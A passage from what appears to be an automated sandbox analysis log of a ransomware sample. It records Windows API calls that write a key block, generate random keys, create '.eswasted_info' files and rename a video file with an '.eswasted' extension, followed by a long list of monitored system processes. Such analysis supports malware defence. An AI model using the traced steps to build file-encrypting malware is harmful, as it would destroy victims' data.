KEY:\r\n[begin_key]N1I/8Dpht37LvYb9NS2VRBh+rtsxodsGjlpUYF2AUGiWrZpUQ98YplVz1DuC8Ch9\r\nGo+a6AFE37zed0yghGg5uXujI33oB1ZOgXNx3MRtF/F4YSHP8kpWnmNeHS5FmaC1\r\nLHZ/vSfb7rabDG2SB5CbXqpvjbkOdcOXKuZPTz8m/HC1f8u+PbzfSCmijUnJJpsX\r\nGFU0O9H0Tz5d+9l5Nt4OF+0N8IxWr//M8f8ThRDoitHESrNQrfRuuEKP33I+wRJ7\r\nOj91FHsyF0k9A8p6ULYen7x+9Q2IsJFcQ47zO5texh40sx4bqGI2Y99ykBjUlQch\r\n3F0MKd3zEzqqR3oNDZeooOuRg5K5QcBx0rdq0ESxijXZAdOwR0m5EpOXQDl1ErJQ\r\nOvAg+RV/n8igXZ3MMTLsXXHEdi5uMYjG/bCVLhZb96tW22dd8pDPu5SDTuEH6uLa\r\n8/nXrKSeHLlWT+soTSf+8x0CmYkBDmBrZS+IAq8dCYJ0j+WlAf4lpT3x9Gi5Xtcd\r\nyKbQ8kjJgtJ1bYO+sJ5CV/TpPd7pPWmRjy06j1GlX0aVfJhoHwjGO93wbdzdisQi\r\nRZbolwq+ErccIWPYJqNRHWPZ4lKV1MvqA0+g6n/anabLIvlVe8rlxGmedLK48RyN\r\n9k6EXsJe5HEF/D6K9o7wUZFjxthKUzGAuLg1atO7gY+=[end_key]\r\nKEEP IT\r\n") returned 990 [0098.172] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73a000 | out: hHeap=0x6d0000) returned 1 [0098.172] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0098.172] SetEndOfFile (hFile=0x108) returned 1 [0098.175] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0098.175] CloseHandle (hObject=0x108) returned 1 [0098.227] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0098.227] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x727bf8 | out: hHeap=0x6d0000) returned 1 [0098.227] ResetEvent (hEvent=0xfc) returned 1 [0098.228] _aulldvrm () returned 0x0 [0098.228] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f0e0) returned 1 [0098.229] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0098.229] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.229] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv") returned 53 [0098.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x71ec18 [0098.229] lstrcpyW (in: lpString1=0x71ec82, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0098.229] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1312050 [0098.229] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f0e0) returned 1 [0098.230] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x1312050 | out: pbBuffer=0x1312050) returned 1 [0098.230] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0098.230] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted_info" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0098.231] WriteFile (in: hFile=0x108, lpBuffer=0x1312050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1312050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0098.232] SetEndOfFile (hFile=0x108) returned 1 [0098.232] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.232] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312050 | out: hHeap=0x6d0000) returned 1 [0098.232] lstrcpyW (in: lpString1=0x71ec82, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0098.232] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted")) returned 1 [0098.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv.eswasted" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0098.234] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0098.234] GetFileSize (in: hFile=0x134, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x1907b8a [0098.234] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1907b8a) returned 0x1f50000 [0098.235] CloseHandle (hObject=0x134) returned 1 Process: id = "23" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x45f9c000" os_pid = "0x92c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 331 os_tid = 0x93c Thread: id = 332 os_tid = 0x3a4 Thread: id = 334 os_tid = 0x6fc Thread: id = 335 os_tid = 0xae8 Thread: id = 336 os_tid = 0x700 Thread: id = 337 os_tid = 0x618 Thread: id = 338 os_tid = 0x360 Process: id = "24" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x45246000" os_pid = "0xb90" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00065441" [0xc000000f], "LOCAL" [0x7] Thread: id = 341 os_tid = 0xb94 Thread: id = 344 os_tid = 0x8e8 Thread: id = 345 os_tid = 0xa30 Thread: id = 346 os_tid = 0xbd8 Thread: id = 347 os_tid = 0x8f8 Process: id = "25" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3de51000" os_pid = "0xab8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k secsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\WinDefend" [0xe], "NT AUTHORITY\\Logon Session 00000000:00065822" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 348 os_tid = 0xb8c Thread: id = 349 os_tid = 0xa90 Thread: id = 350 os_tid = 0x4fc Thread: id = 351 os_tid = 0x31c Process: id = "26" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x39c08000" os_pid = "0x5c4" os_integrity_level = "0x4000" os_privileges = "0x60b16000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x1ac" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 354 os_tid = 0x96c Thread: id = 355 os_tid = 0x95c Thread: id = 356 os_tid = 0x948 Thread: id = 357 os_tid = 0x938 Thread: id = 358 os_tid = 0xb0c Thread: id = 359 os_tid = 0x928 Thread: id = 360 os_tid = 0x918 Thread: id = 361 os_tid = 0xb0 Thread: id = 362 os_tid = 0xa6c Process: id = "27" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 385 os_tid = 0x8 Thread: id = 386 os_tid = 0x38 Thread: id = 387 os_tid = 0x34 Thread: id = 388 os_tid = 0x24 Thread: id = 389 os_tid = 0x90 Thread: id = 390 os_tid = 0x9c Thread: id = 391 os_tid = 0x78 Thread: id = 392 os_tid = 0xc0 Thread: id = 393 os_tid = 0x28 Thread: id = 394 os_tid = 0x3c Thread: id = 395 os_tid = 0x4c Thread: id = 396 os_tid = 0x44 Thread: id = 397 os_tid = 0x40 Thread: id = 398 os_tid = 0x5c Thread: id = 399 os_tid = 0xb4 Thread: id = 400 os_tid = 0x60 Thread: id = 401 os_tid = 0xc4 Thread: id = 402 os_tid = 0xcc Thread: id = 403 os_tid = 0xd0 Thread: id = 404 os_tid = 0xb8 Thread: id = 405 os_tid = 0xd4 Thread: id = 406 os_tid = 0xd8 Thread: id = 407 os_tid = 0xdc Thread: id = 409 os_tid = 0x30 Thread: id = 411 os_tid = 0xe8 Thread: id = 412 os_tid = 0xf0 Thread: id = 414 os_tid = 0x48 Thread: id = 415 os_tid = 0x100 Thread: id = 416 os_tid = 0x104 Thread: id = 417 os_tid = 0x2c Thread: id = 418 os_tid = 0x108 Thread: id = 419 os_tid = 0x110 Thread: id = 420 os_tid = 0x10c Thread: id = 421 os_tid = 0x80 Thread: id = 422 os_tid = 0x8c Thread: id = 423 os_tid = 0x118 Thread: id = 424 os_tid = 0x64 Thread: id = 428 os_tid = 0x130 Thread: id = 429 os_tid = 0x134 Thread: id = 430 os_tid = 0x138 Thread: id = 431 os_tid = 0x13c Thread: id = 440 os_tid = 0x84 Thread: id = 445 os_tid = 0xb0 Thread: id = 451 os_tid = 0x190 Thread: id = 460 os_tid = 0x68 Thread: id = 476 os_tid = 0x88 Thread: id = 477 os_tid = 0x98 Thread: id = 480 os_tid = 0x1c Thread: id = 498 os_tid = 0x74 Thread: id = 501 os_tid = 0x20 Thread: id = 504 os_tid = 0x260 Thread: id = 517 os_tid = 0x50 Thread: id = 520 os_tid = 0xbc Thread: id = 532 os_tid = 0x2d0 Thread: id = 541 os_tid = 0x2ec Thread: id = 542 os_tid = 0x2fc Thread: id = 584 os_tid = 0x3b4 Thread: id = 600 os_tid = 0x3f8 [0257.536] KeDelayExecutionThread (WaitMode=0x0, Alertable=0, Interval=0xfffff880028b25a8*=-1216102246) Thread: id = 605 os_tid = 0x104 Thread: id = 636 os_tid = 0x3f4 Thread: id = 655 os_tid = 0x448 Thread: id = 664 os_tid = 0xa0 Thread: id = 672 os_tid = 0x494 Thread: id = 673 os_tid = 0x450 Thread: id = 675 os_tid = 0x44c Thread: id = 678 os_tid = 0x4a4 Thread: id = 702 os_tid = 0x94 Thread: id = 744 os_tid = 0x5c0 Process: id = "28" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c8cb000" os_pid = "0xe0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 408 os_tid = 0xe4 Thread: id = 410 os_tid = 0xf4 Thread: id = 425 os_tid = 0x11c Thread: id = 436 os_tid = 0x160 Process: id = "29" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x2cbb1000" os_pid = "0xf8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 413 os_tid = 0xfc Process: id = "30" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c902000" os_pid = "0x120" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 426 os_tid = 0x124 Process: id = "31" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x2c7f1000" os_pid = "0x128" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x120" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 427 os_tid = 0x12c Thread: id = 432 os_tid = 0x140 Thread: id = 433 os_tid = 0x144 Thread: id = 434 os_tid = 0x148 Thread: id = 435 os_tid = 0x14c Thread: id = 446 os_tid = 0x184 Thread: id = 452 os_tid = 0x198 Thread: id = 453 os_tid = 0x19c Thread: id = 457 os_tid = 0x1b4 Thread: id = 467 os_tid = 0x1dc Process: id = "32" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x2c608000" os_pid = "0x150" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 437 os_tid = 0x154 Process: id = "33" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x2c6f7000" os_pid = "0x158" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x120" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 438 os_tid = 0x15c Thread: id = 448 os_tid = 0x188 Thread: id = 449 os_tid = 0x18c Thread: id = 454 os_tid = 0x1a0 Thread: id = 455 os_tid = 0x1a4 Thread: id = 456 os_tid = 0x1b0 Thread: id = 470 os_tid = 0x1ec Process: id = "34" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0xbee0000" os_pid = "0x164" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x150" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 439 os_tid = 0x168 Thread: id = 441 os_tid = 0x16c Thread: id = 442 os_tid = 0x170 Thread: id = 443 os_tid = 0x174 Thread: id = 444 os_tid = 0x178 Thread: id = 450 os_tid = 0x194 Thread: id = 464 os_tid = 0x1d0 Thread: id = 465 os_tid = 0x1d4 Process: id = "35" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1a1e6000" os_pid = "0x17c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "32" os_parent_pid = "0x150" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 447 os_tid = 0x180 Thread: id = 458 os_tid = 0x1c8 Thread: id = 459 os_tid = 0x1cc Thread: id = 523 os_tid = 0x2b0 Thread: id = 538 os_tid = 0x2f4 Thread: id = 598 os_tid = 0x3fc Thread: id = 599 os_tid = 0xcc Thread: id = 607 os_tid = 0x10c Process: id = "36" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0xb1a8000" os_pid = "0x1a8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 461 os_tid = 0x1ac Thread: id = 481 os_tid = 0x208 Thread: id = 482 os_tid = 0x20c Thread: id = 483 os_tid = 0x210 Thread: id = 484 os_tid = 0x214 Thread: id = 485 os_tid = 0x218 Thread: id = 487 os_tid = 0x220 Thread: id = 488 os_tid = 0x224 Thread: id = 503 os_tid = 0x25c Thread: id = 601 os_tid = 0xc8 Thread: id = 608 os_tid = 0x110 Thread: id = 665 os_tid = 0x474 Thread: id = 679 os_tid = 0x4a8 Thread: id = 682 os_tid = 0x4b0 Thread: id = 690 os_tid = 0x4dc Process: id = "37" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x1a0b3000" os_pid = "0x1b8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 462 os_tid = 0x1bc Thread: id = 466 os_tid = 0x1d8 Thread: id = 468 os_tid = 0x1e0 Thread: id = 469 os_tid = 0x1e4 Thread: id = 471 os_tid = 0x1e8 Thread: id = 472 os_tid = 0x1f0 Thread: id = 473 os_tid = 0x1f4 Thread: id = 474 os_tid = 0x1f8 Thread: id = 475 os_tid = 0x1fc Thread: id = 478 os_tid = 0x200 Thread: id = 479 os_tid = 0x204 Thread: id = 606 os_tid = 0x114 Thread: id = 613 os_tid = 0x138 Process: id = "38" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x1a0ba000" os_pid = "0x1c0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x158" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 463 os_tid = 0x1c4 Thread: id = 486 os_tid = 0x21c Thread: id = 518 os_tid = 0x298 Thread: id = 521 os_tid = 0x2a4 Thread: id = 524 os_tid = 0x2ac Thread: id = 525 os_tid = 0x2b4 Thread: id = 527 os_tid = 0x2bc Thread: id = 530 os_tid = 0x2c8 Thread: id = 531 os_tid = 0x2cc Thread: id = 533 os_tid = 0x2d4 Thread: id = 671 os_tid = 0x490 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xb2b1000" os_pid = "0x228" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007144" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 489 os_tid = 0x22c Thread: id = 490 os_tid = 0x230 Thread: id = 491 os_tid = 0x234 Thread: id = 492 os_tid = 0x238 Thread: id = 493 os_tid = 0x23c Thread: id = 494 os_tid = 0x240 Thread: id = 495 os_tid = 0x244 Thread: id = 496 os_tid = 0x248 Thread: id = 497 os_tid = 0x24c Thread: id = 499 os_tid = 0x250 Thread: id = 500 os_tid = 0x254 Thread: id = 502 os_tid = 0x258 Thread: id = 505 os_tid = 0x264 Thread: id = 507 os_tid = 0x270 Thread: id = 508 os_tid = 0x274 Thread: id = 510 os_tid = 0x27c Thread: id = 569 os_tid = 0x374 Process: id = "40" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x19ccd000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b75c" [0xc000000f], "LOCAL" [0x7] Thread: id = 506 os_tid = 0x26c Thread: id = 509 os_tid = 0x278 Thread: id = 511 os_tid = 0x280 Thread: id = 512 os_tid = 0x284 Thread: id = 513 os_tid = 0x288 Thread: id = 514 os_tid = 0x28c Thread: id = 515 os_tid = 0x290 Thread: id = 516 os_tid = 0x294 Thread: id = 647 os_tid = 0x424 Process: id = "41" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x18fdd000" os_pid = "0x29c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ba3f" [0xc000000f], "LOCAL" [0x7] Thread: id = 519 os_tid = 0x2a0 Thread: id = 522 os_tid = 0x2a8 Thread: id = 526 os_tid = 0x2b8 Thread: id = 528 os_tid = 0x2c0 Thread: id = 529 os_tid = 0x2c4 Thread: id = 544 os_tid = 0x304 Thread: id = 548 os_tid = 0x30c Thread: id = 551 os_tid = 0x328 Thread: id = 553 os_tid = 0x330 Thread: id = 554 os_tid = 0x334 Thread: id = 557 os_tid = 0x340 Thread: id = 570 os_tid = 0x378 Thread: id = 571 os_tid = 0x37c Thread: id = 572 os_tid = 0x380 Thread: id = 575 os_tid = 0x390 Thread: id = 576 os_tid = 0x394 Thread: id = 615 os_tid = 0x124 Thread: id = 619 os_tid = 0x1a0 Thread: id = 625 os_tid = 0x264 Thread: id = 628 os_tid = 0x34c Thread: id = 632 os_tid = 0x3fc Thread: id = 634 os_tid = 0x3f0 Thread: id = 738 os_tid = 0x5a8 Thread: id = 739 os_tid = 0x5ac Thread: id = 749 os_tid = 0x5d4 Process: id = "42" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x9169000" os_pid = "0x2d8" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "35" os_parent_pid = "0x17c" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 534 os_tid = 0x2dc Thread: id = 535 os_tid = 0x2e0 Thread: id = 536 os_tid = 0x2e4 Thread: id = 537 os_tid = 0x2e8 Thread: id = 539 os_tid = 0x2f8 Thread: id = 540 os_tid = 0x300 Thread: id = 543 os_tid = 0x308 Thread: id = 545 os_tid = 0x310 Thread: id = 546 os_tid = 0x314 Thread: id = 547 os_tid = 0x318 Thread: id = 726 os_tid = 0x570 Process: id = "43" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x17304000" os_pid = "0x31c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1a8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT 